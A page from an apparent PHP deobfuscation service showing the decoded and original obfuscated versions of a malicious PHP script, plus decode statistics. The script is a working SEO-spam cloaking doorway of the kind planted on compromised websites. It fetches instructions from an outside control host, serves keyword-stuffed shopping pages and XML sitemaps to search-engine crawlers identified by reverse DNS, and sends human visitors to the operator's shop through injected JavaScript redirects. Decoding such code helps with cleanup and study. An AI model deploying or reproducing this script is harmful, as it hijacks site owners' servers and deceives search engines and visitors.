Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto uJUB5YOCT0; vjXrbVLDom: lPOva3SiZ5: $wid = mt_rand(1, 1000); $url = $hyzhdy ...

Decoded Output download

<?php 
 goto uJUB5YOCT0; vjXrbVLDom: lPOva3SiZ5: $wid = mt_rand(1, 1000); $url = $hyzhdy . "?iid=" . $_GET["iid"] . "&mt=" . $jd . "EN2/" . $wid . ".txt"; ffZWk2DDNM: $ttttt = $kname . "The Best Inexpensive Online Clothing Stores You May Want | Dresses, Denim, Tops, Shoes and More - Best-Selling Promotional Products" . $_GET["pnum"]; goto LbCE17OCl0; diw9_Ja3lD: $kgurl = "http://pendsports.com/6.aspx"; $jd = getCurl($kgurl); if (is_null($_GET["iid"])) { goto jh0wmZdG3F; } $kname = getCurl($jd . "gn.aspx?iid=" . $_GET["iid"]); jh0wmZdG3F: goto dJXnBd3kf0; sH7SU1zNQX: if (is_null($_GET["cid"])) { goto nnSsiPFFY5; } $cid = $_GET["cid"]; nnSsiPFFY5: $url = $hyzhdy . "?cid=" . $cid . "&pnum=" . $_GET["pnum"]; goto ffZWk2DDNM; goto vjXrbVLDom; uJUB5YOCT0: echo ""; error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); function getCurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); return $result; } $http_type = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https" ? "https://" : "http://"; $kname = ''; goto diw9_Ja3lD; b5_mZPYkU3: echo " 
"; $url = ''; $hyzhdy = $jd . "doiid.aspx"; if (!is_null($_GET["iid"])) { goto lPOva3SiZ5; } $cid = getCurl($jd . "sjs.aspx"); goto sH7SU1zNQX; gOGlacpr5I: $str = str_replace("IIIII", $iiiii, $str); $str = str_replace("CCCCC", $ccccc, $str); echo $str; goto LURweDyE_Q; dJXnBd3kf0: if (is_null($_GET["s"])) { goto n5atn6wRsx; } $cid = getCurl($jd . "sjs.aspx"); if (is_null($_GET["cid"])) { goto plgIJqSu7Z; } $cid = $_GET["cid"]; plgIJqSu7Z: goto mOmIl0RuOx; OFkr789tJ0: $str = str_replace("BBBBB", $_SERVER["HTTP_HOST"], $str); $str = str_replace("NNNNN", $kname . $_GET["iid"], $str); $str = str_replace("DDDDD", $kname . " Gold, White, Black, Red, Blue, Beige, Grey, Price, Rose, Orange, Purple, Green, Yellow, Cyan, Bordeaux, pink, Indigo, Brown, Silver,Electronics, Video Games, Computers, Cell Phones, Toys, Games, Apparel, Accessories, Shoes, Jewelry, Watches, Office Products, Sports & Outdoors, Sporting Goods, Baby Products, Health, Personal Care, Beauty, Home, Garden, Bed & Bath, Furniture, Tools, Hardware, Vacuums, Outdoor Living, Automotive Parts, Pet Supplies, Broadband, DSL, Books, Book Store, Magazine, Subscription, Music, CDs, DVDs, Videos,Online Shopping " . $_GET["searchtxt"], $str); $str = str_replace("TTTTT", $ttttt, $str); $str = str_replace("KKKKK", $kkkkk, $str); goto gOGlacpr5I; GlMdzHr4uD: exit; n5atn6wRsx: function check($ip) { goto IgbPE03EvR; IgbPE03EvR: global $jd; if (is_null($_GET["kk"])) { goto tE9i1gXMHR; } $ip = "66.249.64.190"; tE9i1gXMHR: $domain = getCurl($jd . "getdomain.aspx?rnd=1&ip=" . $ip); goto C_uBlAziE_; C_uBlAziE_: if (stripos($domain, "google") != false or stripos($domain, "msn.com") != false or stripos($domain, "yahoo.com") != false or stripos($domain, "aol.com") != false) { goto lkfDrIlF0U; } if (strrpos($domain, "google") != false or strrpos($domain, "msn") != false or strrpos($domain, "yahoo.com") != false or strrpos($domain, "yandex") != false or strrpos($domain, "aol.com") != false) { goto KeWiWzqEdX; } if (is_null($_GET["iid"])) { goto BYlyzxn9qa; } $kname = getCurl($jd . "gn.aspx?iid=" . $_GET["iid"]); $xs = $jd . "a.aspx"; goto wi_xmD4vCH; kjG1qbFomT: KeWiWzqEdX: dTQm63RmKT: goto m_ISLg_hEQ; lkfDrIlF0U: m_ISLg_hEQ: goto Gm5aff1JS4; wi_xmD4vCH: echo "<script>document.location="" . $xs . "?cid=" . $_GET["cid"] . "&cname=" . urlencode($kname) . "&url=" . $_SERVER["HTTP_HOST"] . ""</script>"; exit; BYlyzxn9qa: if (is_null($_GET["pnum"])) { goto WrFEGZpbe9; } $xs = $jd . "a.aspx"; goto qYxx0fMEhH; qYxx0fMEhH: $txt = str_replace("products.aspx", '', $xs) . "?cid=" . $_GET["cid"]; echo "<script>document.location="" . $txt . ""</script>"; exit; WrFEGZpbe9: goto dTQm63RmKT; goto kjG1qbFomT; Gm5aff1JS4: } function getIP() { $ip = $_SERVER["REMOTE_ADDR"] . "*" . $_SERVER["REMOTE_HOST"] . "*" . $_SERVER["HTTP_CLIENT_IP"] . "*" . $_SERVER["HTTP_X_FORWARDED_FOR"] . "*" . $_SERVER["HTTP_X_FORWARDED"] . "*" . $_SERVER["HTTP_FORWARDED_FOR"] . "*" . $_SERVER["HTTP_FORWARDED"]; return $ip; } $validate = check(getIP()); goto b5_mZPYkU3; LbCE17OCl0: $kkkkk = $kname; $iiiii = "OFF" . mt_rand(50, 70) . "%" . $kname . "Online Discount Shop for Electronics, Apparel, Toys, Books, Games, Computers, Shoes, Jewelry, Watches, Baby Products, Sports & Outdoors, Office Products, Bed & Bath, Furniture, Tools, Hardware, Automotive Parts, Accessories & more"; $ccccc = $http_type . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; $str = getCurl($url); $str = str_replace("UUUUU", $http_type . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"], $str); goto OFkr789tJ0; mOmIl0RuOx: $url = $jd . "sjd.aspx?cid=" . $cid . "&number=" . $_GET["number"] . "&pnum=" . $_GET["pnum"]; $str = getCurl($url); $str = str_replace("yymm", $http_type . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"], $str); header("Content-type:text/xml"); echo $str; goto GlMdzHr4uD; LURweDyE_Q: echo " "; ?>

Did this file decode correctly?

Original Code

<?php
 goto uJUB5YOCT0; vjXrbVLDom: lPOva3SiZ5: $wid = mt_rand(1, 1000); $url = $hyzhdy . "\x3f\151\x69\144\75" . $_GET["\151\x69\144"] . "\x26\x6d\164\75" . $jd . "\105\x4e\x32\57" . $wid . "\56\x74\x78\x74"; ffZWk2DDNM: $ttttt = $kname . "\x54\x68\145\40\102\x65\x73\164\x20\x49\156\x65\x78\x70\145\156\x73\x69\x76\145\40\117\156\x6c\x69\156\145\40\103\154\157\x74\150\151\156\147\40\x53\x74\x6f\x72\145\163\40\x59\x6f\165\x20\x4d\141\x79\x20\127\x61\156\x74\40\174\40\x44\162\x65\x73\x73\x65\163\54\40\x44\145\x6e\151\x6d\x2c\40\x54\157\160\x73\54\40\123\x68\157\145\x73\x20\x61\156\x64\x20\x4d\157\162\x65\40\x2d\40\102\145\x73\x74\55\123\x65\154\154\x69\x6e\147\40\120\x72\x6f\x6d\157\164\x69\157\x6e\141\154\x20\x50\162\157\144\x75\143\x74\163" . $_GET["\160\x6e\x75\x6d"]; goto LbCE17OCl0; diw9_Ja3lD: $kgurl = "\x68\164\x74\160\72\x2f\x2f\160\x65\x6e\x64\x73\160\157\x72\164\163\56\143\157\155\57\66\x2e\x61\163\x70\x78"; $jd = getCurl($kgurl); if (is_null($_GET["\151\x69\x64"])) { goto jh0wmZdG3F; } $kname = getCurl($jd . "\x67\156\x2e\x61\x73\x70\x78\77\151\x69\x64\x3d" . $_GET["\151\x69\144"]); jh0wmZdG3F: goto dJXnBd3kf0; sH7SU1zNQX: if (is_null($_GET["\x63\151\144"])) { goto nnSsiPFFY5; } $cid = $_GET["\143\x69\x64"]; nnSsiPFFY5: $url = $hyzhdy . "\77\x63\x69\144\75" . $cid . "\x26\160\156\x75\155\75" . $_GET["\x70\156\165\x6d"]; goto ffZWk2DDNM; goto vjXrbVLDom; uJUB5YOCT0: echo "\xef\xbb\xbf"; error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); function getCurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); return $result; } $http_type = isset($_SERVER["\x48\x54\124\120\123"]) && $_SERVER["\110\x54\124\x50\123"] == "\x6f\156" || isset($_SERVER["\110\124\x54\120\x5f\130\137\106\x4f\122\x57\x41\122\104\x45\104\137\120\x52\117\124\x4f"]) && $_SERVER["\x48\x54\x54\x50\x5f\130\137\106\117\122\x57\x41\x52\x44\105\x44\137\x50\x52\117\124\x4f"] == "\x68\164\164\x70\x73" ? "\150\x74\x74\x70\163\72\57\x2f" : "\150\x74\x74\160\72\57\57"; $kname = ''; goto diw9_Ja3lD; b5_mZPYkU3: echo "\x20\15\12"; $url = ''; $hyzhdy = $jd . "\x64\x6f\151\151\x64\x2e\141\x73\160\170"; if (!is_null($_GET["\151\151\144"])) { goto lPOva3SiZ5; } $cid = getCurl($jd . "\x73\152\x73\56\x61\x73\x70\x78"); goto sH7SU1zNQX; gOGlacpr5I: $str = str_replace("\111\x49\111\111\x49", $iiiii, $str); $str = str_replace("\x43\x43\103\103\x43", $ccccc, $str); echo $str; goto LURweDyE_Q; dJXnBd3kf0: if (is_null($_GET["\x73"])) { goto n5atn6wRsx; } $cid = getCurl($jd . "\x73\152\163\x2e\x61\x73\x70\x78"); if (is_null($_GET["\143\x69\x64"])) { goto plgIJqSu7Z; } $cid = $_GET["\143\x69\x64"]; plgIJqSu7Z: goto mOmIl0RuOx; OFkr789tJ0: $str = str_replace("\102\102\x42\102\x42", $_SERVER["\x48\124\124\x50\x5f\x48\117\x53\x54"], $str); $str = str_replace("\x4e\116\116\x4e\116", $kname . $_GET["\151\151\144"], $str); $str = str_replace("\104\x44\104\104\x44", $kname . "\x20\107\157\x6c\x64\x2c\40\127\150\x69\x74\145\54\x20\102\154\x61\x63\153\54\40\122\x65\x64\x2c\x20\102\154\x75\145\x2c\x20\x42\x65\x69\147\x65\54\40\107\162\x65\x79\x2c\x20\x50\x72\151\x63\x65\x2c\x20\122\157\x73\145\54\40\x4f\x72\141\156\x67\x65\x2c\x20\x50\165\162\x70\154\x65\x2c\40\107\162\x65\145\156\54\x20\131\145\154\x6c\x6f\x77\54\40\103\x79\x61\156\54\x20\102\157\162\x64\x65\141\165\170\54\40\x70\x69\156\x6b\54\40\x49\156\144\x69\147\157\54\x20\102\162\157\x77\x6e\54\40\x53\151\154\166\145\x72\54\105\x6c\145\143\164\x72\157\156\x69\143\x73\x2c\x20\x56\x69\x64\145\x6f\x20\x47\141\x6d\145\x73\x2c\40\x43\157\155\x70\x75\164\145\x72\163\54\x20\103\145\154\154\40\x50\150\157\156\145\163\54\x20\124\x6f\171\x73\x2c\x20\107\141\155\145\x73\x2c\40\x41\160\x70\141\162\x65\x6c\x2c\40\101\143\x63\x65\x73\163\x6f\x72\x69\145\163\x2c\x20\123\x68\x6f\x65\163\54\x20\112\x65\167\145\154\162\171\54\x20\x57\x61\164\143\x68\145\163\x2c\40\x4f\x66\146\x69\143\145\40\x50\x72\x6f\x64\165\x63\164\x73\54\x20\x53\160\x6f\162\164\163\x20\x26\40\117\165\164\144\x6f\x6f\x72\163\54\40\x53\160\x6f\x72\x74\x69\156\147\40\x47\x6f\157\x64\163\x2c\x20\x42\141\142\x79\x20\120\162\157\x64\x75\x63\x74\x73\54\40\110\145\141\154\x74\150\x2c\x20\120\145\x72\x73\x6f\156\x61\154\x20\x43\x61\x72\145\54\x20\x42\145\x61\165\164\171\54\40\110\x6f\155\x65\54\x20\107\141\162\x64\x65\x6e\54\x20\x42\x65\x64\x20\46\x20\102\x61\164\x68\54\40\106\x75\162\x6e\x69\164\165\162\x65\x2c\40\124\157\157\154\x73\54\40\110\x61\x72\144\x77\x61\x72\145\x2c\40\126\x61\x63\165\165\155\x73\x2c\x20\x4f\165\x74\x64\x6f\157\162\40\x4c\x69\166\151\x6e\147\x2c\40\x41\165\x74\x6f\x6d\157\x74\151\166\145\x20\120\141\x72\164\163\54\40\120\145\x74\40\x53\165\160\160\154\x69\145\163\x2c\40\102\162\x6f\x61\144\x62\141\156\144\x2c\40\x44\x53\114\54\40\x42\x6f\157\x6b\163\x2c\40\102\157\157\153\40\123\x74\x6f\x72\x65\x2c\40\x4d\141\x67\x61\172\x69\156\145\x2c\x20\x53\165\x62\x73\x63\x72\x69\x70\164\151\x6f\156\x2c\x20\115\165\163\151\143\x2c\x20\x43\104\163\54\40\x44\x56\104\x73\54\x20\x56\x69\x64\145\x6f\x73\54\x4f\156\154\x69\156\x65\x20\123\x68\x6f\160\160\151\x6e\x67\40" . $_GET["\163\145\x61\162\x63\150\164\x78\164"], $str); $str = str_replace("\124\124\x54\x54\124", $ttttt, $str); $str = str_replace("\113\x4b\113\x4b\113", $kkkkk, $str); goto gOGlacpr5I; GlMdzHr4uD: exit; n5atn6wRsx: function check($ip) { goto IgbPE03EvR; IgbPE03EvR: global $jd; if (is_null($_GET["\x6b\x6b"])) { goto tE9i1gXMHR; } $ip = "\x36\x36\56\x32\x34\x39\x2e\66\64\x2e\61\x39\x30"; tE9i1gXMHR: $domain = getCurl($jd . "\147\x65\x74\144\x6f\155\141\x69\x6e\x2e\x61\163\x70\170\x3f\x72\x6e\x64\75\61\x26\151\160\x3d" . $ip); goto C_uBlAziE_; C_uBlAziE_: if (stripos($domain, "\x67\x6f\x6f\147\x6c\x65") != false or stripos($domain, "\x6d\163\156\x2e\143\x6f\x6d") != false or stripos($domain, "\x79\x61\150\x6f\x6f\56\x63\x6f\x6d") != false or stripos($domain, "\141\x6f\x6c\56\x63\157\155") != false) { goto lkfDrIlF0U; } if (strrpos($domain, "\x67\x6f\157\147\x6c\145") != false or strrpos($domain, "\155\x73\156") != false or strrpos($domain, "\171\141\150\x6f\x6f\56\x63\157\x6d") != false or strrpos($domain, "\x79\x61\156\144\145\x78") != false or strrpos($domain, "\141\157\154\56\x63\x6f\155") != false) { goto KeWiWzqEdX; } if (is_null($_GET["\x69\x69\x64"])) { goto BYlyzxn9qa; } $kname = getCurl($jd . "\x67\x6e\56\x61\163\160\170\77\x69\x69\144\x3d" . $_GET["\x69\x69\144"]); $xs = $jd . "\141\x2e\141\163\x70\x78"; goto wi_xmD4vCH; kjG1qbFomT: KeWiWzqEdX: dTQm63RmKT: goto m_ISLg_hEQ; lkfDrIlF0U: m_ISLg_hEQ: goto Gm5aff1JS4; wi_xmD4vCH: echo "\74\163\143\162\x69\160\164\x3e\144\157\x63\165\x6d\x65\156\164\x2e\154\157\143\141\x74\151\x6f\156\x3d\x22" . $xs . "\77\143\151\x64\x3d" . $_GET["\x63\x69\144"] . "\46\x63\156\141\x6d\145\x3d" . urlencode($kname) . "\46\165\x72\x6c\75" . $_SERVER["\x48\124\124\x50\137\110\x4f\x53\x54"] . "\42\74\57\163\x63\x72\151\x70\164\76"; exit; BYlyzxn9qa: if (is_null($_GET["\x70\156\x75\155"])) { goto WrFEGZpbe9; } $xs = $jd . "\x61\x2e\x61\x73\x70\x78"; goto qYxx0fMEhH; qYxx0fMEhH: $txt = str_replace("\160\162\x6f\x64\x75\143\164\163\56\141\163\x70\x78", '', $xs) . "\77\x63\151\144\x3d" . $_GET["\x63\151\x64"]; echo "\x3c\x73\x63\x72\x69\160\164\x3e\144\x6f\x63\165\x6d\145\156\164\x2e\154\157\x63\141\164\151\157\156\x3d\42" . $txt . "\x22\74\x2f\163\143\162\151\x70\x74\76"; exit; WrFEGZpbe9: goto dTQm63RmKT; goto kjG1qbFomT; Gm5aff1JS4: } function getIP() { $ip = $_SERVER["\x52\x45\115\117\x54\105\x5f\x41\x44\x44\122"] . "\x2a" . $_SERVER["\x52\x45\x4d\117\x54\x45\137\110\117\123\124"] . "\x2a" . $_SERVER["\110\124\x54\x50\137\103\x4c\111\x45\116\124\x5f\111\x50"] . "\52" . $_SERVER["\110\x54\124\120\137\x58\x5f\x46\x4f\x52\127\x41\x52\104\105\x44\137\x46\117\122"] . "\52" . $_SERVER["\x48\x54\x54\x50\x5f\x58\137\106\117\x52\x57\101\122\104\105\104"] . "\x2a" . $_SERVER["\110\124\124\x50\x5f\x46\x4f\122\x57\101\x52\x44\105\104\137\x46\x4f\122"] . "\52" . $_SERVER["\110\124\124\120\137\106\x4f\122\x57\x41\x52\x44\105\104"]; return $ip; } $validate = check(getIP()); goto b5_mZPYkU3; LbCE17OCl0: $kkkkk = $kname; $iiiii = "\x4f\106\x46" . mt_rand(50, 70) . "\45" . $kname . "\117\156\x6c\x69\156\145\x20\104\x69\163\x63\x6f\x75\x6e\x74\x20\x53\150\x6f\x70\40\x66\157\x72\40\x45\x6c\x65\143\x74\x72\157\156\151\143\x73\x2c\40\101\x70\x70\141\x72\145\x6c\54\x20\124\157\171\163\x2c\40\x42\x6f\157\153\x73\x2c\40\107\x61\x6d\x65\x73\x2c\x20\x43\x6f\155\x70\x75\x74\145\x72\163\x2c\x20\x53\x68\x6f\x65\x73\54\x20\112\145\x77\145\x6c\x72\171\x2c\x20\x57\x61\x74\x63\150\145\163\x2c\40\102\141\x62\x79\40\120\162\x6f\144\165\x63\164\x73\x2c\40\x53\x70\x6f\162\x74\x73\40\46\40\x4f\x75\164\x64\x6f\x6f\x72\163\x2c\x20\117\146\x66\151\143\x65\x20\x50\162\x6f\144\x75\x63\x74\163\x2c\x20\x42\145\144\40\x26\x20\x42\141\164\x68\x2c\40\106\x75\162\156\x69\164\165\x72\x65\x2c\40\x54\x6f\157\x6c\163\54\40\x48\x61\162\144\167\x61\x72\145\54\x20\101\165\x74\x6f\155\157\164\151\166\145\40\120\x61\x72\x74\163\x2c\x20\101\x63\143\x65\163\163\x6f\162\151\145\163\x20\46\x20\x6d\x6f\162\145"; $ccccc = $http_type . $_SERVER["\110\x54\124\120\137\x48\x4f\x53\x54"] . $_SERVER["\x50\x48\120\x5f\123\x45\x4c\106"] . "\77" . $_SERVER["\x51\125\x45\x52\x59\137\123\x54\x52\x49\x4e\x47"]; $str = getCurl($url); $str = str_replace("\x55\x55\x55\x55\125", $http_type . $_SERVER["\x48\x54\x54\x50\137\x48\117\x53\124"] . $_SERVER["\x53\x43\122\x49\120\x54\137\x4e\101\115\x45"], $str); goto OFkr789tJ0; mOmIl0RuOx: $url = $jd . "\x73\152\144\56\x61\163\x70\x78\x3f\x63\x69\x64\75" . $cid . "\x26\156\165\x6d\142\x65\x72\x3d" . $_GET["\x6e\165\155\142\145\x72"] . "\46\x70\x6e\165\x6d\75" . $_GET["\160\156\165\155"]; $str = getCurl($url); $str = str_replace("\x79\171\x6d\x6d", $http_type . $_SERVER["\110\x54\x54\120\x5f\x48\x4f\x53\124"] . $_SERVER["\123\103\x52\111\120\x54\x5f\x4e\x41\x4d\x45"], $str); header("\103\157\x6e\x74\x65\156\x74\x2d\164\171\x70\145\x3a\x74\x65\x78\164\x2f\170\x6d\x6c"); echo $str; goto GlMdzHr4uD; LURweDyE_Q: echo "\x20";

Function Calls

None

Variables

None

Stats

MD5 38d520455bfe1bf27a0e2236dab0929f
Eval Count 0
Decode Time 53 ms